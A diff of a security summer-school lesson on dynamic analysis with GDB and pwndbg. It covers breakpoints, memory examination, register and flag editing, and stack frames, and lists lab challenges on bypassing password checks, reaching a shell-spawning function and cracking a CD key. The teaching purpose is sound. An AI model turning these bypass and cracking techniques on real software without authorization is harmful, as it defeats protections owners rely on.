-} -``` - -``` {.code .bash} -pwndbg> pdis 0x080483ca -Dump of assembler code for function main: - 0x080483ca <+0>:,push ebp #save the old frame pointer - 0x080483cb <+1>:,mov ebp,esp #create the new frame pointer - 0x080483cd <+3>:,sub esp,0x8 #create space for local variables - 0x080483d0 <+6>:,mov DWORD PTR [esp+0x4],0x3 #push the last parameter of the function that is to be called - 0x080483d8 <+14>:,mov DWORD PTR [esp],0xa #push the second to last(the first in this case) parameter of the function that is to be called - 0x080483df <+21>:,call 0x80483b4 #call the function - 0x080483e4 <+26>:,mov eax,0x0 - 0x080483e9 <+31>:,leave - 0x080483ea <+32>:,ret -End of assembler dump. -pwndbg> pdis 0x080483b4 -Dump of assembler code for function add: - 0x080483b4 <+0>:,push ebp #save the old frame pointer - 0x080483b5 <+1>:,mov ebp,esp #create a new frame pointer - 0x080483b7 <+3>:,sub esp,0x10 #create space for local variables - 0x080483ba <+6>:,mov eax,DWORD PTR [ebp+0xc] #move the first parameter into the EAX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)+last_parameter(4 bytes)) - 0x080483bd <+9>:,mov edx,DWORD PTR [ebp+0x8] #move the second parameter into the EDX register (ebp+saved_ebp(4 bytes)+return_addres(4 bytes)) - 0x080483c0 <+12>:,add eax,edx #add the registers - 0x080483c2 <+14>:,mov DWORD PTR [ebp-0x4],eax #place the result inside the local variable (c) - 0x080483c5 <+17>:,mov eax,DWORD PTR [ebp-0x4] #place the result inside the eax register in order to return it - 0x080483c8 <+20>:,leave - 0x080483c9 <+21>:,ret -End of assembler dump. -``` - -As you can see the parameters were pushed in reverse order, and the rule regarding the reference to EBP holds. - -If you don\'t understand why the offset for the parameters starts at EBP+0x08 and not EBP follow through with the next section. - - -#### Calling functions (call and ret) - -When calling a function the callee places the return address on the stack. This address is nothing more than a bookmark so that execution can resume where it left off once the called function finishes -execution. - -The last instruction in functions is usually a `ret` instruction that resumes execution to the callee. - -For a better understanding of function calling and returning, from an execution flow point of view, please follow through with the following tip. - -The call instruction could be translated to the following instructions: - -1. `push eip` -2. `mov eip, address_of_called_function` - -The ret instruction could be translated into: - -1. `pop eip` - -The visual depiction of how the stack looks while a program is executing -can be found in section 2 but will be included here as well: - -

- -

- - - -### Next lesson preview: Buffer Overflows - - -Now that we have a complete overview of the stack we can step forward to stack based buffer overflows. - -A buffer overflow takes place when there is a lack of checking regarding boundaries and usually result in complete control of the program\'s instruction pointer. This takes place when a buffer overflows its boundaries and overwrites the return address of a function. - -A typical example of buffer overflows can be seen in the following picture: - -

- -

- -Challenges ----------- - -Use GDB and pwndbg to run the code provided in the Activities section. - -### 01. Challenge - Explore The Simple Password Protected Bash - - -The executable gets input from the user and evaluates it against a static condition. If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. - -Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. - -Gather as much info about the executable as possible through the techniques you have learned in previous sessions. - -Think of modifying registers for forcing the executable to call thefunction (there is more than one way of doing this). - -### 02. Challenge - Simple Password Protected Bash Destruction - -What is the condition against which your input is evaluated in the executable contained in the executable `sppb`? - -The ultimate goal is to be able to craft an input for the binary so that -the `password_accepted` function is called (modifying registers while -running the program in GDB is just for training purposes). - - - -### 03. Challenge - Domino - -Analyze the binary, reverse engineer what it does and get a nice message -back. - -### 04. Challenge - Call me - -Investigate the binary in `04-challenge-call-me/src/call_me` and find -out the flag - -
- Hint - There is something hidden you can toy around with. -
- - -
- Hint - The challenge name is a hint. -
- - -### 05. Challenge - Snooze Me - - -I wrote a simple binary that computes the answer to life, the universe and everything. It swear it works... eventually. - -### 06. Challenge - Phone Home - - -To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. - -Unfortunately, the key feature of the application is now unreachable due to a bug. Can you bypass the impossible condition? - -### 07. Challenge - Chain encoder - -How do you reverse something made to be ireversible, you are welcome to find out in this challenge. - -### 08. Challenge - Simple cdkey - -I found this software but i don't have the cd key, can you crack it for me? - ------------------------------------------------------------------------- - -Except where otherwise noted, content on this wiki is licensed under the -following license: [CC Attribution-Share Alike 4.0 International](https://creativecommons.org/licenses/by-sa/4.0/deed.en) +# Dynamic Analysis + +## Introduction + +### Objectives & Rationale + +The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation. +In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program. + +Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1, RSA. +We can change the input to a more suggestive one and use the output to estimate what function was used to convert it. + +Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities. + +With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary. + +### Prerequisites + +In the current session we will use GDB extensively. +We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features. + +To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb"). + +The executable used in the demo is called sppb and is the challenge 1 binary. + +### Before GDB + +One thing you should always do before firing up GDB is to try to learn all the available information on the executable you're trying to debug through the techniques that have been presented so far. + +For the purposes of this session it is a good idea to always run`objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where. + +```console +objdump -M intel -d [executable] +``` + +## GDB Basic Commands + +### Getting help with GDB + +Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. +For example searching for help for the `disassemble` command can be obtained by running the following command in GDB: + +```text +# Print info about all help areas available. +# Identify the area of your question. +(gdb) help + +# Print info about available data commands. +# Identify the command you want to learn more about. +(gdb) help data + +# Print info about a specific command. +# Find out more about the command you are searching for. +(gdb) help disassemble +``` + +### Opening a program with GDB + +A program can be opened for debugging in a number of ways. +We can run GDB directly attaching it to a program: + +```console +gdb [executable-file] +``` + +Or we can open up GDB and then specify the program we are trying to attach to using the file or file-exec command: + +```console +$ gdb +(gdb) file [executable-file] +``` + +Furthermore we can attach GDB to a running service if we know its process id: + +```text +gdb --pid [pid_number] +``` + +### Disassembling + +GDB allows disassembling of binary code using the `disassemble` command +(it may be shortened to `disas`). +The command can be issued either on a +memory address or using labels. + +```text +(gdb) disassemble *main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +....Output ommited..... + +(gdb) disassemble 0x080491c9 +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 +``` + +### Adding Breakpoints + +Breakpoints are important to suspend the execution of the program being debugged in a certain place. +Adding breakpoints is done with the `break` command. +A good idea is to place a breakpoint at the main function of the program you are trying to exploit. +Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. +This means that we can set a breakpoint for the start of our program in two ways: + +```text +(gdb) break *main (when the binary is not stripped of symbols) +(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off) +``` + +The general format for setting breakpoints in GDB is as follows: + +```text +(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] +``` + +Issuing the `break` command with no parameters will place a breakpoint at the current address. +GDB allows using abbreviated forms for all the commands it supports. +Learning these abbreviations comes with time and will greatly improve you work output. +Always be on the lookout for using abbreviated commands + +The abbreviated command for setting breakpoints is simply `b`. + +### Listing Breakpoints + +At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: + +```text +(gdb) info breakpoints +``` + +You can also issue the abbreviated form of the command + +```text +(gdb) i b +``` + +### Deleting Breakpoints + +Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoints number, as it is listed in the output of the +`info breakpoints` command. + +```text +(gdb) delete breakpoints [breakpoint_number] +``` + +You can also delete all active breakpoints by issuing the following the `delete breakpoints` command with no parameters: + +```text +(gdb) delete breakpoints +``` + +Once a breakpoint is set you would normally want to launch the program into execution. +You can do this by issuing the `run` command. +The program will start executing and stop at the first breakpoint you have set. + +```text +(gdb) run +``` + +#### Execution Flow + +Execution flow can be controlled in GDB using the `continue`, `stepi`,`nexti` as follows: + +```text +(gdb) help continue +# Continue program being debugged, after signal or breakpoint. +# If proceeding from breakpoint, a number N may be used as an argument, +# which means to set the ignore count of that breakpoint to N - 1 (so that the breakpoint won't break until the Nth time it is reached). + +(gdb) help stepi +# Step one instruction exactly. +# Argument N means do this N times (or till program stops for another reason). + +(gdb) help nexti +# Step one instruction, but proceed through subroutine calls. +# Argument N means do this N times (or till program stops for another reason). +``` + +You can also use the abbreviated format of the commands: `c` (`continue`), `si` (`stepi`), `ni` (`nexti`). + +If at any point you want to start the program execution from the beginning you can always reissue the `run` command. + +Another technique that can be used for setting breakpoints is using offsets. + +As you already know, each assembly instruction takes a certain number of bytes inside the executable file. +This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. + +```text +(gdb) break *main +Breakpoint 1 at 0x80491d0 +(gdb) run +Starting program: sppb + +Breakpoint 1, 0x80491d0 in main () +(gdb) disassemble main +Dump of assembler code for function main: + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +.....Output ommited..... +(gdb) break *main+4 +Breakpoint 2 at 0x80491cd +``` + +### Examine and Print, Your Most Powerful Tools + +GDB allows examining of memory locations be them specified as addresses or stored in registers. +The `x` command (for *examine*) is arguably one of the most powerful tool in your arsenal and the most common command you are going to run when exploiting. +The format for the `examine` command is as follows: + +```text +(gdb) x/nfu [address] + n: How many units to print + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + u: Unit + b: Byte + h: Half-word (2 bytes) + w: Word (4 bytes) + g: Giant word (8 bytes) + i: Instruction (read n assembly instructions from the specified memory address) +``` + +In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in registers and variables. +The format for the `print` command is as follows: + +```text +(gdb) p/f [what] + f: Format character + a Pointer + c Read as integer, print as character + d Integer, signed decimal + f Floating point number + o Integer, print as octal + s Treat as C string (read all successive memory addresses until null character and print as characters) + t Integer, print as binary (t="two") + u Integer, unsigned decimal + x Integer, print as hexadecimal + i Instruction (read n assembly instructions from the specified memory address) +``` + +For a better explanation please follow through with the following example: + +```text +# A breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint. +# At this point we want to see which are the following 10 instructions. +(gdb) x/10i 0x80491cd + 0x80491cd : sub esp,0x4 + 0x80491d0 : mov eax,ds:0x804c030 + 0x80491d5 : push 0x0 + 0x80491d7 : push 0x1 + 0x80491d9 : push 0x0 + 0x80491db : push eax + 0x80491dc : call 0x8049080 + +# Let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion). +# The other parameter will be an address where the input will be stored. +(gdb) x/s 0x804a02a +0x804a02a: "%d" + +# We now set a breakpoint for *main+56. +(gdb) break *0x08049201 +Breakpoint 3 at 0x08049201 +(gdb) continue +Continuing. + +Breakpoint 3, 0x08049201 in main () + +# We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. +# Let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input). +# Take note that in GDB registers are preceded by the "$" character very much like variables. +(gdb) x/d 0xffffcf70 <- (your address) +0xffffcf70: +# Now let's print the contents of the eax register as hexadecimal. +(gdb) p/x $eax +$1 = + +# The diference between p and x can be observed by issuing the following commands: +x/s 0x804a030 +0x804a030: "Your password is: %d. Evaluating it...\n" + +p /s 0x804a030 + +# $2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). + +# In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves. +# As you can see the address holds the memory for the beginning of the string. +# This shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format +# You can think of it as "x" dereferencing while "p" not dereferencing +``` + +### GDB Command file + +When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. +GDB commands files will allow you to run a specific set of commands automatically after each command you issue manually. +This comes in especially handy when you're stepping through a program and want to see what happens with the registers and stack after each instruction is ran, which is the main target when exploiting. + +The examine command only has sense when code is already running on the machine so inside the file we are going to use the display command which translates to the same output. + +In order to use this option you must first create your commands file. +This file can include any GDB commands you like but a good start would be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the top of the stack. + +The reason for examining all of the above after each instruction is ran will become more clear once the we go through the second section of the session. + +Command file template: + +```text +display/10i $eip +display/x $eax +display/x $ebx +display/x $ecx +display/x $edx +display/x $edi +display/x $esi +display/x $ebp +display/32xw $esp +``` + +In order to view all register values you could use the `x` command. +However the values of all registers can be obtained by running the`info all-registers` command: + +```text +(gdb) info all-registers +eax 0x8048630,134514224 +ecx 0xbffff404,-1073744892 +edx 0xbffff394,-1073745004 +ebx 0xb7fc6ff4,-1208193036 +esp 0xbffff330,0xbffff330 +ebp 0xbffff368,0xbffff368 +esi 0x0,0 +edi 0x0,0 +eip 0x80484e9,0x80484e9 +eflags 0x286,[ PF SF IF ] +cs 0x73,115 +ss 0x7b,123 +ds 0x7b,123 +es 0x7b,123 +fs 0x0,0 +gs 0x33,51 +st0 *value not available* +st1 *value not available* +st2 *value not available* +st3 *value not available* +st4 *value not available* +st5 *value not available* +st6 *value not available* +st7 *value not available* +fctrl 0x37f,895 +fstat 0x0,0 +ftag 0xffff,65535 +fiseg 0x0,0 +fioff 0x0,0 +foseg 0x0,0 +---Type to continue, or q to quit--- +fooff 0x0,0 +fop 0x0,0 +mxcsr 0x1f80,[ IM DM ZM OM UM PM ] +ymm0 *value not available* +ymm1 *value not available* +ymm2 *value not available* +ymm3 *value not available* +ymm4 *value not available* +ymm5 *value not available* +ymm6 *value not available* +ymm7 *value not available* +mm0 *value not available* +mm1 *value not available* +mm2 *value not available* +mm3 *value not available* +mm4 *value not available* +mm5 *value not available* +mm6 *value not available* +mm7 *value not available* +``` + +One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. +Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. +In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter. + +### Using GDB to modify variables + +GDB can be used to modify variables during runtime. +In the case of exploitation this comes in handy as the program can be altered at runtime with the purpose of changing the execution path to desired branches. + +## Pwndbg + +As you can see using GDB can be cumbersome, this is why we recommend using the pwndbg plug-in. +The tutorial as well as the repository of the project can be found here [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg") + +Give the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the`pwndbg` plug-in. +Some of the advantages of using pwngdb include: + +- Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file) +- Automatic dereferencing and following through of memory locations +- Color coding + +An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef"). + However, this tutorial is designed with Pwndbg in mind. + +### Pwndbg Commands + +`pdis` command gives a pretty output that is similar to what the `disas` command in GDB prints: + +```text +Usage: pdis 0x80491d0 +``` + +If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble) Usage: -pdis \[address\] [N] - where N is the number of instructions you want to be printed + +The `stepi` command has the same effect as in GDB however, if you are running Pwndbg you will notice that after each step Pwndbg will automatically print register values, several lines of code from eip +register and a portion of the stack: + +```text +pwndbg> stepi + +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +────────────────────────────────────[ REGISTERS ]──────────────────────────────────── +*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 + EBX 0x0 + ECX 0xa00af61b + EDX 0xffffcfb4 ◂— 0x0 + EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +*EIP 0x80491d5 (main+12) ◂— push 0 /* 'j' */ +─────────────────────────────────────[ DISASM ]────────────────────────────────────── + 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> + ► 0x80491d5 push 0 + 0x80491d7 push 1 + 0x80491d9 push 0 + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + 0x80491f0 call puts@plt + + 0x80491f5 add esp, 4 +──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── +In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c + 6 execve("/bin/sh", 0, 0); + 7 } + 8 + 9 int main() + 10 { + ► 11 setvbuf(stdout, NULL, _IOLBF, 0); + 12 int readValue = 0; + 13 + 14 printf("Please provide password: \n"); + 15 scanf("%d", &readValue); + 16 +──────────────────────────────────────[ STACK ]────────────────────────────────────── +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── + ► f 0 0x80491d5 main+12 + f 1 0xf7de0fd6 __libc_start_main+262 + +``` + +You can always use the following commands to obtain context at any given moment inside the debug process: + +- `context reg` +- `context code` +- `context stack` +- `context all` + +One additional Pwndbg command which can be used to show values in registers is the `telescope` command. +The command dereferentiates pointer values until it gets to a value and prints out the entire trace. + +The command can be used with both registers and memory addresses: + +```text +pwndbg$ telescope $esp +00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +pwndbg> telescope 0xffffcf84 +00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 +03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b +04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... +05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' +06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c +07:001c│ 0xffffcfa0 ◂— 0x1 +``` + +In the example above, the memory address 0x8048630 was loaded into EAX. +That is why examining the register or the memory location gives the same output. + +For more information on various Pwndbg commands you can always visit the Pwndbg help through the `pwndbg` command It is always a better idea to use Pwndbg commands when available. +However you should also know the basics of using GDB as well. + +### Altering variables and memory with Pwndbg and GDB + +In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: + +- `$pc - $eip` +- `$sp - $esp` +- `$fp - $ebp` + +In addition to these there are also two registers which can be used to view the processor state `$ps - processor status` + +Values of memory addresses and registers can be altered at execution time. +Because altering memory is a lot easier using Pwndbg we are going to use it throughout today's session. + +The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. + +Using GDB the `$eflags` register can be easily modified: + +```text +pwndbg> reg eflags +EFLAGS 0x282 [ cf pf af zf SF IF df of ] +Set the ZF flag +pwndbg> set $eflags |= (1 << 6) +Clear the ZF flag +pwndbg> set $eflags &= ~(1 << 6) +``` + +Notice that the flags that are set are printed in all-caps when the`reg eflags` command is issued. + +The `set` command (GDB native) can be used to modify values that reside inside memory. + +```text +pwndbg> telescope 0x804a010 +00:0000│ 0x804a010 ◂— 'Please provide password: ' +01:0004│ 0x804a014 ◂— 'se provide password: ' +02:0008│ 0x804a018 ◂— 'rovide password: ' +03:000c│ 0x804a01c ◂— 'de password: ' +04:0010│ 0x804a020 ◂— 'assword: ' +05:0014│ 0x804a024 ◂— 'ord: ' +06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ +07:001c│ 0x804a02c ◂— 0x0 + +pwndbg> set {char [14]} 0x804a010 = "No pass here" +Written 28 bytes to 0x8048630 +pwndbg> telescope 0x8048630 +00:0000│ 0x804a010 ◂— 'No pass here' +01:0004│ 0x804a014 ◂— 'ass here' +02:0008│ 0x804a018 ◂— 'here' +03:000c│ 0x804a01c ◂— 0x70200000 +04:0010│ 0x804a020 ◂— 'assword: ' +05:0014│ 0x804a024 ◂— 'ord: ' +06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ +07:001c│ 0x804a02c ◂— 0x0 +``` + +As you can see the string residing in memory at address `0x8048630` has been modified using the `set` command. + +Pwngdb does not offer enhancements in modifying registry values. +For modifying registry values you can use the GDB `set` command. + +``` {.code} +pwngdb> p/x $eax +$10 = 0x1 +pwngdb> set $eax=0x80 +pwngdb> p/x $eax +$11 = 0x80 +``` + +## The Stack + +This section details process of function calling in detail. +Understanding function calling and stack operations during program execution is esential to exploitation. + +The stack is one of the areas of memory which gets the biggest attention in exploitation writing. + +### Stack Growth + +The stack grows from high memory addresses to low memory addresses. + +```text +pwndbg> pdis $eip + + 0x80491db push eax + 0x80491dc call setvbuf@plt + + 0x80491e1 add esp, 0x10 + 0x80491e4 mov dword ptr [ebp - 8], 0 + 0x80491eb push 0x804a010 + ► 0x80491f0 call puts@plt + +pwndbg> p/x $esp +$1 = 0xffffcf6c +pwndbg> si +0x8049050 in puts@plt () +pwndbg> p/x $esp +$5 = 0xffffcf68 +``` + +As you can see from the example above the \$esp register had an initial value of `0xffffcf6c`. +The next instruction that is about to be executed is a push (it pushes `0x0` on the stack). +We execute the instruction and then reevaluate the value of `$esp`. +As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). + +### Frame Pointers and Local Function Variables + +Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. + +This container is called a function frame. +The idea behind it is that the processor must know which area of the stack belongs to which function. + +In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. +Can you tell what they are based on the output below? + +```text +pwndbg> break main +Breakpoint 1 at 0x80484c8 +pwndbg> run +[----------------------------------registers-----------------------------------] + EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' + EBX 0x0 + ECX 0xb8a6a751 + EDX 0xffffcfb4 ◂— 0x0 + EDI 0x80490a0 (_start) ◂— xor ebp, ebp + ESI 0x1 + EBP 0xffffcf78 ◂— 0x0 + ESP 0xffffcf70 ◂— 0x1 + EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] +[-------------------------------------code-------------------------------------] + 0x080491c9 <+0>: push ebp + 0x080491ca <+1>: mov ebp,esp + 0x080491cc <+3>: push ebx + 0x080491cd <+4>: sub esp,0x4 +=> 0x080491d0 <+7>: mov eax,ds:0x804c030 + 0x080491d5 <+12>: push 0x0 + 0x080491d7 <+14>: push 0x1 + 0x080491d9 <+16>: push 0x0 + 0x080491db <+18>: push eax + +[------------------------------------stack-------------------------------------] +00:0000│ esp 0xffffcf70 ◂— 0x1 +01:0004│ 0xffffcf74 ◂— 0x0 +02:0008│ ebp 0xffffcf78 ◂— 0x0 +03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 +04:0010│ 0xffffcf80 ◂— 0x1 +05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' +06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' +07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 + +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080491d0 in main () +pwndbg> disass password_accepted + + + 0x080491b2 <+0>: push ebp + 0x080491b3 <+1>: mov ebp,esp + 0x080491b5 <+3>: push 0x0 + 0x080491b7 <+5>: push 0x0 + 0x080491b9 <+7>: push 0x804a008 + 0x080491be <+12>: call 0x8049070 + 0x080491c3 <+17>: add esp,0xc + 0x080491c6 <+20>: nop + 0x080491c7 <+21>: leave + 0x080491c8 <+22>: ret + +``` + +What we did is we created a breakpoint for the start of the main function and then ran the program. +As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. + +We then set a breakpoint for another function called `pass_accepted`, continued execution and entered a password that we know is going to pass validation. +Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. + +The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. + +In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container(`mov ebp,esp`). + +For a visual explanation please see below: + +![Frame pointer](https://security.cs.pub.ro/summer-school/wiki/_media/session/s5_frame_pointer_picture.jpg) + +As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function's frame. +That is why it is most often referred to as the frame pointer. + +In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function + +If you analyze the instructions at the beginning of main, you can spot these as being: + +- An `and esp,0xfffffff0` instruction. + +- A `sub` insctruction that subtracts a hex value from ESP. + +The first of the two instructions has the purpose of aligning the stack to a specific address boundary. +This is done to increase processor efficiency. +In our specific case, the top of the stack gets aligned to a 16 byte multiple address. + +One of the purposes of the stack inside functions is that of offering address space in which to place local variables. +The second instruction preallocates space for local function variables. + +Let's see how local variables are handled inside assembly code. + +```c +#include +int main() +{ + int a; + a=1; + return 0; +} +``` + +```text +kali@kali:~/sss$ gdb test +GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 +Copyright (C) 2012 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "i686-linux-gnu". +For bug reporting instructions, please see: +... +Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done. +pwndbg> break main +Breakpoint 1 at 0x80483ba +pwndbg> run +[----------------------------------registers-----------------------------------] +EAX: 0x1 +EBX: 0xb7fc6ff4 --> 0x1a0d7c +ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c +ESI: 0x0 +EDI: 0x0 +EBP: 0xbffff378 --> 0x0 +ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) +EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x80483b4
:, push ebp + 0x80483b5 :,mov ebp,esp + 0x80483b7 :,sub esp,0x10 +=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 + 0x80483c1 :,mov eax,0x0 + 0x80483c6 :,leave + 0x80483c7 :,ret + 0x80483c8:,nop +[------------------------------------stack-------------------------------------] +0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) +0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c +0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) +0012| 0xbffff374 --> 0x0 +0016| 0xbffff378 --> 0x0 +0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) +0024| 0xbffff380 --> 0x1 +0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value + +Breakpoint 1, 0x080483ba in main () +``` + +As you can see the operations that relate to the stack are: + +- The old frame pointer is saved. +- EBP takes the value of ESP (the frame pointer is set to point to the current function's frame). +- `0x10` is subtracted from ESP (reserve space for local variables). +- The value `0x01` is placed at the address of EBP-0x4 (the local variable `a` takes the value 1). + +### Function Parameters + 